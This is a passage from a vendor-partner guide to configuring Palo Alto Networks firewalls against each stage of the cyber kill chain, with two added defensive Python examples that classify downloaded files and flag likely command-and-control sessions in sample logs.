This content further compounds the two points of concern for the target, and now presents a convenient option of clicking on “Enable Content” to obtain closure on the matter. Despite a security warning, a number of users still choose to enable the content, allowing malicious macros to run on their system. After enabling macros, none of the promised data is shown to the victim; however, the malicious macro script executes in the background without the user’s knowledge.

 

3.3. Kill Chain Step 3 – Delivery

 

At this stage, the attacker tries to deliver malicious code to the target. This is the first stage where the attack goes from the outside to the inside and where it could be stopped by the Next-Generation FireWall.

 

3.3.1. Possible Action by the Attacker (Risks)

Based on Palo Alto Networks’ latest Threat Landscape Review, the two main channels for malware delivery are e-mail and web browsing.

 

E-mail can be used to deliver malicious code directly as an attachment or by luring the user to click on a link inside the e-mail which then delivers the malware via web browsing (see below). Enterprises often spend a considerable amount on e-mail security solutions to secure their corporate e-mail but at the same time allow their employees to use private web-based e-mail. Such private web-based e-mail often provides only moderate protection against malicious attachments and evades inspection through the use of SSL encryption, which makes it an ideal channel to deliver malware while circumventing corporate e-mail security.

 

Web Browsing requires the attacker to place malware on a webpage which ideally is very popular and visited by a lot of potential victims. Common targets are often webpages of smaller companies who once paid a web development firm to set up their webpage with one of the common content management systems like WordPress or Drupal. The company then only manages the content of the webpage but does not update the software of the content management system itself which makes it an easy target once a new vulnerability has been discovered for this system.

 

Once an attacker has compromised a webpage, he can deliver malicious code to the user’s device in mainly two different forms. The first option is to embed malicious code directly into the webpage, which is then loaded by the user’s browser and can thereby exploit vulnerabilities of the browser itself or any plug-ins loaded by the browser. The other option is to get the user to download a file like a PDF which can exploit vulnerabilities in the software that opens the file, or even to directly download malware in the form of a portable executable file that can be run on the victim’s PC.

 

Another way to distribute malicious code via web browsing is to use an advertisement network. Webpages that provide space for advertisements load code from the advertisement company every time the webpage is loaded. With this, an attacker can buy advertisement space and distribute malicious code through, for instance, Flash videos. The risk of the attacker’s malicious code being blocked by the advertisement firm is high, but if it is not detected then it provides high leverage as the malicious code is automatically distributed to hundreds of web pages that serve thousands of users.

 

Another important aspect to take into account with web browsing is encrypted traffic. SSL is widely used to secure communications in order to guarantee the authenticity, integrity and confidentiality of the transferred data. For the very same reason, sophisticated malware and cybercriminals use SSL to hide their traffic and are thereby able to deliver malware into corporate networks while evading detection. It is important to note that the volume of SSL traffic on the network is not the criterion for enabling or disabling SSL decryption; the risk arises from the fact that SSL offers the possibility to evade detection, and the traffic volume generated by modern malware is often very low.

 

3.3.2. Threat Prevention Techniques for Mitigation & Defence

  • Application Control (Outbound) – Application control, in the form of a positive application allow list which only allows specific applications and blocks all others, is a fundamental threat prevention technique at this stage of the kill chain as it significantly reduces the attack surface. Non-corporate e-mail applications, including web-based e-mail as well as IMAP and POP3, should be blocked, while SMTP should only be allowed to and from the corporate e-mail server.
  • SSL Decryption (SSL Forward Proxy) – SSL decryption is essential to detect and block any type of malware as well as applications inside an SSL tunnel. From both a privacy and a performance point of view it is not advisable to decrypt all SSL traffic. Therefore a policy should be defined which explicitly excludes from SSL decryption trusted applications and URLs with a low risk of delivering malware, like for instance Microsoft-Update, as well as sensitive URL categories like financial services. All other traffic should be decrypted, as sophisticated malware in particular hides inside the remaining unknown traffic. Special attention should be paid to URL categories like web-based-email, social-networking and online-storage-and-backup, as these applications could be used to transfer sensitive information but on the other hand are also known to be used to distribute malware. The implementation of SSL Forward Proxy requires every client on the corporate network to trust an internal root certificate authority “CA”, which can either be a CA certificate generated by the Next-Generation FireWall itself or an existing corporate CA.
  • URL Filtering – URL Filtering should be applied to all internet related policies to block access to any high-risk categories like malware, web advertisements, proxy-avoidance-and-anonymizers, phishing, peer-to-peer, parked and hacking. URLs categorised as “unknown” should be blocked as well, because adversaries frequently register new domains which might not have been categorised yet. After the initial implementation of the Next-Generation FireWall, it is recommended to review and re-categorize any known URLs which are categorized as unknown and then block the “unknown” URL category after such an initial grace period. Palo Alto Networks’ PAN-DB URL Filtering solution is supported by its threat intelligence cloud “WildFire”, which makes it very effective in blocking access to URLs that distribute malware. So for instance, if WildFire identifies a new malicious file then it also knows the URL from which it was downloaded, and this URL is then categorised as malware by PAN-DB. With a valid WildFire subscription, the Next-Generation FireWall can also extract HTTP/HTTPS links contained in SMTP and POP3 email messages and forward the links to the WildFire cloud for analysis. WildFire will then visit the links to determine if the corresponding web page hosts any exploits. If it detects malicious behaviour on the page then it will generate a detailed analysis report and log it to the WildFire Submissions log on the firewall that forwarded the links. This log includes the email header information (email sender, recipient and subject) so that the message can be identified and deleted from the mail server, and/or the recipient can be tracked down to mitigate the threat if the email has already been delivered and/or opened. The URL is also added to PAN-DB and categorized as malware, which automatically blocks any users from visiting the webpage.
  • Anti-Virus – An Anti-Virus profile should be applied to all internet related policies to block known viruses. The action for all decoders related to file transfers (FTP, HTTP, SMB) should be set to block, both for the regular Anti-Virus signatures and for the Anti-Virus signatures from WildFire. For SMTP the action should be set to block as well, which will send a “541 – Recipient Address Rejected – Blacklist, Anti-Spam, Mailfilter/Firewall Block” response back to the sending SMTP server to prevent it from resending the blocked message. For POP3 and IMAP it is technically not possible to clean files or properly terminate an infected file transfer in-stream without affecting the entire session, due to shortcomings in these protocols in dealing with this kind of situation. Therefore they should be kept at the default action “alert”, while the applications themselves should be blocked as part of the application control in the security policy.
  • Vulnerability Protection & Anti-Spyware – A Vulnerability Protection and an Anti-Spyware profile should be applied to all internet related policies to block known vulnerabilities and spyware. Anti-Virus signatures have a very low false-positive rate as they clearly identify a file that is known to be malware. Vulnerability Protection and Anti-Spyware signatures, on the other hand, match on network communication and are therefore more prone to false positives. The reason is not only that this is technically more complex but also that there is a grey zone between what some people would classify as malware and others as legitimate software. Browser toolbars for instance often share usage information about their users, which some people don’t see as problematic while others would clearly classify it as spyware. Therefore every company needs to make its own decision on what should be blocked, and this makes optimization of the security profiles essential for effective protection. As a starting point, it is recommended to block any threats with a severity of critical, while the action for all other severities should be set to follow the default action, which is more conservative to avoid false positives. Further customization is highly recommended. Packet captures should be enabled as these capture the malicious code that was sent by the attacker, which provides additional information for analysis as well as proof of the attack. Palo Alto Networks’ Vulnerability Protection and Anti-Spyware signatures are based on malware detected by its threat intelligence cloud “WildFire” as well as its Advanced Endpoint Protection solution “Traps”, which makes them very effective. Please note that Vulnerability Protection and Anti-Spyware are only capable of blocking already known malware and that SSL decryption is required to scan files inside any HTTP based communication.
  • Zero-day exploit detection and prevention (WildFire) – All downloads of files with a risk of containing an exploit, like Java, Flash, PDF, Microsoft Office and Android APK files, should be analysed by WildFire, as regular Anti-Virus, Anti-Spyware and Vulnerability Protection will only block known threats. WildFire extends the Next-Generation FireWall’s capabilities to identify and block targeted and unknown malware (0-day) by actively analysing unknown files in a safe, cloud-based virtual environment, where Palo Alto Networks can directly observe malicious behaviour. WildFire automatically generates protections for newly discovered malware and delivers these protections globally, enabling all customers to benefit from the analysis. An immediate delivery of signatures (every 15 minutes), as well as the analysis of Java, Flash, PDF, Microsoft Office, Android APK files and e-mail links, requires an additional WildFire subscription. Please note that SSL decryption is required to analyse files inside any HTTP based communication.

 

3.4. Kill Chain Step 4 – Exploitation

 

At this stage, the malicious code has been delivered to the target where it can trigger the exploitation of a vulnerability. At this stage, the attacker is acting inside the trusted environment. An exploit is a sequence of commands that takes advantage of a bug or vulnerability in a software application or process. Attackers use exploits as a means to access and use a system to their advantage. To gain control of a system, the attacker must bypass a chain of vulnerabilities in the system. Blocking any attempt to exploit a vulnerability in the chain will block the exploitation attempt entirely.

 

The transfer of the malicious code traverses the firewall at the previous stage, where it can be blocked, but only if the malicious code triggers a signature match of a known threat. The exploit itself however can only be detected and blocked on the end-user’s device and as such is outside the control of the firewall. The prevention of exploits on the target is therefore outside the scope of this document. However, we would still like to point out possible solutions like Palo Alto Networks’ Advanced Endpoint Protection called “Traps”.

 

In a typical attack scenario, an attacker attempts to gain control of a system by first attempting to corrupt or bypass memory allocation or handlers. Using memory-corruption techniques such as buffer overflows and heap corruption, the hacker can then trigger a bug in the software or exploit a vulnerability in a process. The attacker must then manipulate a program to run code provided or specified by the attacker and evade detection. If the attacker gains access to the operating system, the attacker could then download a Trojan horse or other malware programs that contain malicious executables, or otherwise use the system to their advantage, which is the next step of the kill chain (step 5 – Installation).

 

Classical AntiVirus solutions employ signatures to identify executables, dynamic-link libraries (DLLs), or other pieces of code as malicious. The weakness of this method is that signature-based solutions take time to identify newly created threats known only to the attacker (also known as Zero-Day attacks or exploits) and add them to lists of known threats, leaving the endpoint vulnerable until the signatures are updated.

 

Attackers rely on a small number of exploit techniques like buffer overflows and heap sprays to trigger a bug in software. Traps prevents exploit attempts by blocking these exploit techniques rather than trying to identify the malware based on its signature, which makes it possible to block even zero-day attacks and vulnerabilities which are still unknown.

 

When a user opens a non-executable file, such as a PDF or Word document, the Traps agent seamlessly injects drivers into the software that opens the file. The drivers are injected at the earliest possible stage before any files belonging to the process are loaded into memory. If the process then opens the file, Traps injects a code module called an Exploitation Prevention Module (EPM) into the process. The EPM targets a specific exploitation technique and is designed to prevent attacks on program vulnerabilities based on memory corruption or logic flaws.

 

Examples of attacks that the EPMs can prevent include:

  • Memory corruption
  • Java code from running in browsers, under certain conditions
  • Executables from spawning child processes, under certain conditions
  • Dynamic-link library (DLL) hijacking (replacing a legitimate DLL with a malicious one of the same name)
  • Hijacking program control flow
  • Inserting malicious code as an exception handler

 

In addition to automatically protecting processes from such attacks, Traps reports any prevention events to the Endpoint Security Manager and performs additional actions according to the settings of the policy rules. Common actions that Traps performs include collecting forensic data and notifying the user about the event. Traps does not perform or rely on any additional scanning or monitoring actions, which makes it lightweight with very little CPU and memory usage.

 

3.5. Kill Chain Step 5 – Installation

At stage number 5, the attacker tries to install a remote access trojan “RAT” or backdoor on the target to maintain persistence inside the environment. At this point, it is important to understand the difference between an exploit, which we described in the previous two stages, and executable malware like a Trojan or backdoor. For an advanced persistent threat, the attacker needs to establish persistence on the target, which means that he has to establish full remote access and control on the victim’s device while evading detection. At the exploit stage, the attacker is however still limited by the functionality of the program in which the vulnerability was exploited. Even if the attacker gained shell access through the exploit, he is still limited to the operation of the shell, which for instance does not provide any advanced functionality like key-logging. In addition, such shell access is usually logged, which makes it difficult to evade detection. Therefore the attacker has to download additional executable software like a Remote Access Trojan “RAT” which will provide all the necessary functionality to gain full remote access independent of the exploited application, as well as additional tools to, for instance, monitor the victim’s activity.

 

Through social engineering, adversaries have the possibility to deliver executable software like a Remote Access Trojan “RAT” directly to the end user’s device for instance via e-mail and trick the victim into installing the software. This allows the attacker to skip the previous two steps of the kill chain. However, the scope for such attacks is narrow which makes adversaries still dependent on the previous two exploit stages for most attacks.

 

3.5.1. Possible Action by the Attacker (Risks)

At the installation stage, the attacker uses the elevated access which he gains through the previous exploitation stage to execute commands or code which instructs the target device to download the RAT or backdoor. The biggest risk is therefore if an end-user device is allowed to download executable files from the internet. Once downloaded, the RAT will install itself, often with rootkit capabilities that enable the malware to embed itself deeply into the operating system which makes it stealthy. With this, it will evade detection by hiding the existence of certain processes or programs.

 

Most AntiVirus solutions will not be able to detect such modern malware at the download stage as they are highly polymorphic which means they constantly change their signatures to effectively avoid the detection by signature-based AntiVirus. Even if the AntiVirus software receives an update at a later stage that could identify the malicious file then it will still not be able to detect or remove it as the malware is already installed and hidden by the rootkit.

 

3.5.2. Threat Prevention Techniques for Mitigation & Defence

  • Application Control (Outbound) – The basis for security protection is to limit the attack surface and with this the exposure of a network and its devices. One of the most effective methods to reduce the attack surface is network segmentation together with controlling the use of applications through a positive application allow list. With this, only applications that are explicitly configured in the security policy are allowed and consequently all others are blocked. Alternatively, a negative enforcement policy should be implemented in environments where it is not feasible to allow only specific applications, like guest networks which have to provide for a wide variety of constantly changing applications. Such a negative enforcement policy will then block all high-risk or known bad applications, in particular high-risk applications which are known to be used to transfer malware. These applications can be dynamically grouped on the Next-Generation firewall by using an Application filter with the subcategory “file-sharing”, a risk level of 5 and the application characteristics “Prone to misuse” and “Used by malware”. Application filters are automatically updated with the installation of every new content update, which means that if Palo Alto Networks identifies a new application that matches these criteria then this application will automatically be blocked. These kinds of networks still present a high risk and should therefore be separated from the internal network through a dedicated security zone on the firewall, and access into the internal network should be restricted at a similar security level as connections originating from the internet. Please note that SSL decryption is required to identify applications inside any HTTP based communication.
  • URL Filtering – As described in the previous stage, URL Filtering should be applied to all internet related policies to block access to any high-risk categories like malware, web advertisements, questionable, proxy-avoidance-and-anonymizers, phishing, peer-to-peer, parked and hacking.
  • File Blocking – File Blocking is one of the most reliable threat prevention techniques at this stage of the kill chain as it is capable of blocking the download of executable files. This is important because the advanced functionality of a RAT can only be delivered in the form of fully compiled software, i.e. a portable executable “PE” file. A file blocking profile should therefore be applied to all security policies which allow Internet access, to block the download of “PE” files. The Next-Generation firewall will also detect PE files inside of zip files, in which case the entire zip file is blocked. Data inside of encrypted files like “encrypted-zip” or “encrypted-rar” cannot be decrypted and should therefore be blocked as well. The download of legitimate files from trusted sources can be explicitly allowed through dedicated security policies based on applications and URLs. Please note that SSL decryption is required to analyse files inside any HTTP based communication.
  • Anti-Virus & Anti-Spyware – If the download of executable files is allowed from trusted sources then these files should still be scanned by an Anti-Virus and Anti-Spyware profile because there is no guarantee that for instance the webserver of a trusted partner or even a high profile company will not be compromised by malware. Please note that Anti-Virus and Anti-Spyware are only capable of blocking already known malware and SSL decryption is required to scan files inside any HTTP based communication.
  • Zero-day malware detection and prevention (Wildfire) – As with Anti-Virus and Anti-Spyware, if the download of executable files is allowed from trusted sources then these files should still be analysed by Wildfire to detect and block 0-day malware. A basic WildFire service is included in the base system of the Next-Generation FireWall to analyse PE files while signature updates are delivered only on a daily basis as part of the threat prevention subscription. An immediate delivery of signatures (every 15min) requires an additional Wildfire subscription. Please note that SSL decryption is required to analyse files inside any HTTP based communication.
  • SSL Decryption (SSL Forward Proxy) – SSL decryption should be enabled, especially for all communication with the Internet. With this, the firewall will decrypt the data, which enables it to identify applications inside the SSL tunnel as well as to block files.


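To illustrate the File Blocking bullet above (PE downloads, PE files nested inside zip archives, and encrypted archives whose contents cannot be inspected), here is an added Python example; it is not Palo Alto Networks code and the firewall’s own decoders are far more thorough. The nesting limit and the treatment of malformed archives as uninspectable are assumptions, and all sample files are constructed in memory.

```python
"""Toy file-blocking classifier (added example, not PAN-OS code)."""
import io
import struct
import zipfile

PE_SIGNATURE = b"PE\0\0"
ZIP_LOCAL_HEADER = b"PK\x03\x04"
MAX_NESTING = 3          # assumption: archives nested deeper are not inspected


def is_pe(data: bytes) -> bool:
    """True if data has a Windows PE layout: a DOS 'MZ' header whose e_lfanew
    field (offset 0x3C) points at the 'PE\\0\\0' NT header signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == PE_SIGNATURE


def classify(data: bytes, depth: int = 0) -> str:
    """Verdict for a downloaded blob, mirroring the file blocking profile:
    'pe'                - portable executable, blocked
    'zip-with-pe'       - archive containing a PE at any inspected depth, blocked
    'encrypted-zip'     - password-protected archive, cannot be inspected, blocked
    'zip-uninspectable' - malformed or too deeply nested (assumption), blocked
    'allow'             - nothing matched"""
    if is_pe(data):
        return "pe"
    if data[:4] != ZIP_LOCAL_HEADER:
        return "allow"                       # not a zip container
    if depth >= MAX_NESTING:
        return "zip-uninspectable"
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return "zip-uninspectable"
    with zf:
        # General purpose flag bit 0 marks an encrypted member; the whole
        # archive is then blocked, like the "encrypted-zip" file type.
        if any(info.flag_bits & 0x01 for info in zf.infolist()):
            return "encrypted-zip"
        for info in zf.infolist():
            verdict = classify(zf.read(info), depth + 1)
            if verdict == "pe":
                return "zip-with-pe"
            if verdict != "allow":
                return verdict               # nested zip-with-pe / encrypted / uninspectable
    return "allow"


# --- constructed samples (not real files) ---------------------------------

def make_fake_pe() -> bytes:
    """Minimal byte layout that satisfies is_pe(); not a runnable program."""
    dos_header = bytearray(b"MZ" + b"\0" * 0x3E)        # 0x40 bytes
    struct.pack_into("<I", dos_header, 0x3C, 0x40)      # NT header right after
    return bytes(dos_header) + PE_SIGNATURE + b"\0" * 20


def make_zip(members: dict, encrypted: bool = False) -> bytes:
    """Build a stored (uncompressed) zip in memory. With encrypted=True the
    encryption flag bit is set in every local and central header to mimic a
    password-protected archive; the member data itself is left untouched."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    data = bytearray(buf.getvalue())
    if encrypted:
        # flags sit at offset 6 of a local header and offset 8 of a central one
        for signature, flag_offset in ((ZIP_LOCAL_HEADER, 6), (b"PK\x01\x02", 8)):
            pos = data.find(signature)
            while pos != -1:
                data[pos + flag_offset] |= 0x01
                pos = data.find(signature, pos + 4)
    return bytes(data)


if __name__ == "__main__":
    samples = {
        "report.pdf": b"%PDF-1.4 constructed sample",
        "tool.exe": make_fake_pe(),
        "docs.zip": make_zip({"readme.txt": b"plain text"}),
        "invoice.zip": make_zip({"invoice.exe": make_fake_pe()}),
        "nested.zip": make_zip({"inner.zip": make_zip({"run.exe": make_fake_pe()})}),
        "secret.zip": make_zip({"data.bin": b"payload"}, encrypted=True),
    }
    for name, blob in samples.items():
        print(f"{name:12s} -> {classify(blob)}")
```
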
3.6. Kill Chain Step 6 – Command and Control (C2)

 

At the command and control stage, the remote access trojan “RAT” on the compromised host will establish a communication channel to the attacker’s command and control “C2” server. Once the C2 channel has been established, the intruder has “hands on the keyboard” access to the compromised host inside the target environment.

 

For end-user devices, there is also the possibility of an already compromised host connecting to the corporate network. This stage provides the opportunity to identify such malware-infected devices as they come into the network and stop further communication between the compromised host and the C2 server.

 

3.6.1. Possible Action by the Attacker (Risks)

Persistence is one of the main objectives of an APT. When the command and control “C2” server is no longer reachable, because for instance it has been taken down by law enforcement, then the RAT on the compromised host has to automatically establish a C2 channel to a new C2 server so that the attacker can re-establish control. Attackers achieve this resilience by using DNS which easily enables them to point their command and control domain to a new IP address. More sophisticated malicious operations on the internet use a technique called “Fast-flux” which constantly changes the mapping of the IP address to the domain. This enables the attacker to build a network that obscures his true location as all connections are proxied through a constantly changing layer of IP addresses.

Once the RAT has resolved the IP address of its C2 server via DNS it will establish the C2 channel. Blocking these C2 channels can be challenging with legacy port-based firewalls: applications can use any TCP or UDP port number to communicate, so the assumption on which port-based firewalls are designed, that a specific port equals a specific application, is no longer true. The same applies to the command and control communication of malware, which often uses port numbers of common applications like web-browsing (port 80) or DNS (port 53) to evade detection.

3.6.2. Threat Prevention Techniques for Mitigation & Defence

  • Application Control (Outbound) – The Next-Generation FireWall identifies any type of network communication as an application, independently of the port. It is obviously impossible to know of every application in existence and therefore all network communications which cannot be associated with a list of well-known applications will be identified as either “unknown-udp” or “unknown-tcp”. Blocking these unknown applications is one of the most effective prevention techniques for command and control traffic as C2 channels are mostly proprietary applications that are identified as unknown by the Next-Generation FireWall. These will therefore be blocked even if it is a completely new type or zero-day command and control application.
  • DNS Sinkhole – Palo Alto Networks identifies malicious command and control domains using its threat intelligence cloud “Wildfire”. Once Wildfire identifies new malware based on its behaviour it also knows the domain to which it tried to connect to establish a command and control channel. These domains are then delivered to the firewall as part of the Anti-Spyware protection which enables the firewall to block them. A challenge that arises out of this however is that most devices send DNS queries to an internal DNS server. The DNS server then forwards this query through the firewall to the internet, which means that if the firewall blocks a DNS request for a malicious domain, the logged originator is the DNS server and not the compromised host. DNS sinkholing is an additional feature that solves this visibility problem by forging the DNS response returned to the client host for queries directed at malicious domains, so that clients attempting to connect to malicious domains for command-and-control will instead attempt to connect to a sinkhole IP address defined by the administrator. Infected hosts can then be easily identified in the traffic logs because any host that attempts to connect to the sinkhole IP address is most likely infected with malware.
  • Anti-Spyware – Similar to command and control domains, Wildfire also identifies the command and control channel communication of newly identified malware. Signatures for such command and control traffic are then delivered to the firewall as part of the Anti-Spyware protection which enables the firewall to block them.
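As an added illustration, not part of the original guide and not a Palo Alto Networks tool, the Python script below applies the two signals described above, sessions identified as unknown-tcp/unknown-udp and sessions to the sinkhole address, to constructed traffic log lines; the sinkhole IP, the reduced field layout and all sample addresses are assumptions.

```python
"""Flag likely C2 activity in PAN-OS style traffic log lines.

Two signals described in the text: sessions identified as unknown-tcp /
unknown-udp, and sessions whose destination is the DNS sinkhole address.
The log lines are CONSTRUCTED samples in a reduced CSV shape, not a real
PAN-OS export; the sinkhole address is an assumed administrator value.
"""
import csv
from collections import Counter
from io import StringIO

SINKHOLE_IP = "10.255.255.254"  # assumed: set to the sinkhole IP you configured
UNKNOWN_APPS = {"unknown-tcp", "unknown-udp"}

# Constructed sample log: receive_time,src,dst,dport,application,action
SAMPLE_LOG = """\
receive_time,src,dst,dport,application,action
2024/01/10 09:01:02,10.1.1.20,93.184.216.34,443,ssl,allow
2024/01/10 09:01:05,10.1.1.20,10.255.255.254,443,unknown-tcp,allow
2024/01/10 09:01:07,10.1.1.31,203.0.113.9,80,unknown-tcp,deny
2024/01/10 09:01:09,10.1.1.31,10.255.255.254,80,web-browsing,allow
2024/01/10 09:02:11,10.1.1.42,198.51.100.7,53,dns,allow
2024/01/10 09:02:15,10.1.1.42,203.0.113.9,53,unknown-udp,deny
"""

def parse_traffic_log(text):
    """Return the log as a list of dicts, one per session row."""
    return list(csv.DictReader(StringIO(text)))

def sinkhole_hits(rows, sinkhole_ip=SINKHOLE_IP):
    """Hosts that contacted the sinkhole address. Because the forged DNS
    answer goes to the client, src here is the end host, not the internal
    DNS server, which is exactly the visibility the text describes."""
    return sorted({r["src"] for r in rows if r["dst"] == sinkhole_ip})

def unknown_app_sessions(rows):
    """Count unknown-tcp/udp sessions per (src, app, action): shows which
    hosts would be (or were) hit by a rule blocking unknown applications."""
    counts = Counter()
    for r in rows:
        if r["application"] in UNKNOWN_APPS:
            counts[(r["src"], r["application"], r["action"])] += 1
    return counts

def c2_review(text, sinkhole_ip=SINKHOLE_IP):
    """The two lists an administrator would want in a daily C2 report."""
    rows = parse_traffic_log(text)
    return {"sinkhole_hosts": sinkhole_hits(rows, sinkhole_ip),
            "unknown_app_counts": unknown_app_sessions(rows)}
```

Run `c2_review(SAMPLE_LOG)` to get the hosts that hit the sinkhole and a per-host count of unknown-application sessions; on a real export, replace `SAMPLE_LOG` with the CSV text and keep only the fields named in the header.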

3.7. Kill Chain Step 7 – Actions on Objectives

Only at the last stage, after progressing through the first six phases, can intruders take action to achieve their original objectives.

3.7.2. Threat Prevention Techniques for Mitigation & Defence

  • Zero Trust – At stage 7, the host has been fully compromised and is under total control of the attacker. The best defence strategy at this stage is “Survival” by limiting the possible damage. So for instance an end-user device carries a high risk of being compromised because of the human factor and in some cases the mobility of such devices making restricting physical access a challenge. However, compromising a single end-user device might not be sufficient for the attacker to achieve the objective of data exfiltration because the valuable data is mostly stored on servers inside the datacentre. Granular network segmentation based on a Zero Trust Architecture with the principles of “Never Trust – Always Verify” will contain the attack at a boundary that will limit the possible damage.
  • Data Filtering – The Next-Generation FireWall has the capability to identify and block unique data patterns in network communication. This data filtering feature can be used to identify and stop the exfiltration of data. The functionality can be compared to a data loss prevention “DLP” solution even though it is not as extensive.

4. Monitoring

  • Risks – After the initial setup and implementation of best practices, things usually settle down and the administrator is not monitoring the events on the firewall as closely on a daily basis. This creates the risk that new types of attack or any other events which require action by the administrator may be overlooked.
  • Mitigation – Custom reports should be set up and automatically sent by e-mail to administrators for review. It is important that these reports are relevant and only show information that is most likely to require action by the security administrator. Irrelevant information will quickly lead to a situation where the administrator is no longer actively reviewing the reports. As part of this analysis, a custom report has been created for each area covered in this document, and these custom reports can be used as a base for further customization.

Follow us on LinkedIn to hear when we publish the next best practice video or sign up to our FireWall Best Practices mailing list.

Need Help?

Contact us or give us a call +353 (1) 5241014 / +1 (650) 407-1995 – We are a Palo Alto Networks Certified Professional Service Provider (CPSP) and the Next-Generation Security Platform is what we do all day every day. Let us share our experience with you to make your Next-Generation Security project a smooth experience but most importantly a peace of mind by truly securing your valuable IT assets.


This document is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License. You are free to share and adapt this document as long as you give appropriate credit to the author Lars Meyer. If you remix, transform or build upon the material, you must distribute your contributions under the same license as the original.

Disclaimer: Consigas Limited accepts no liability for the content of this blog post, or for the consequences of any actions taken on the basis of the information provided. Any views or opinions presented in this document are solely those of the author and do not necessarily represent those of Palo Alto Networks.